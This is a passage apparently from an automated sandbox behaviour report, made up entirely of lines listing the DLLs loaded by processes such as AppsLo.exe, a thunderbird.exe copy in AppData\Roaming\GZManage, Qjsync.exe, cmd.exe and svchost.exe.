Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\AppsLo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: js3250.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: xpcom_core.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: smime3.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: ssl3.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: nsldap32v50.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: nsldappr32v50.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: xpcom_compat.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: softokn3.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: js3250.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: smime3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: ssl3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldap32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldappr32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_compat.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: softokn3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: js3250.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_core.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: smime3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: ssl3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldap32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldappr32v50.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_compat.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: softokn3.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qjsync.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msftedit.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: comsvcs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmlua.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: js3250.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_core.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: smime3.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: ssl3.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nss3.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldap32v50.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nsldappr32v50.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: xpcom_compat.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: nspr4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plds4.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\GZManage\thunderbird.exe	Section loaded: plc4.dll
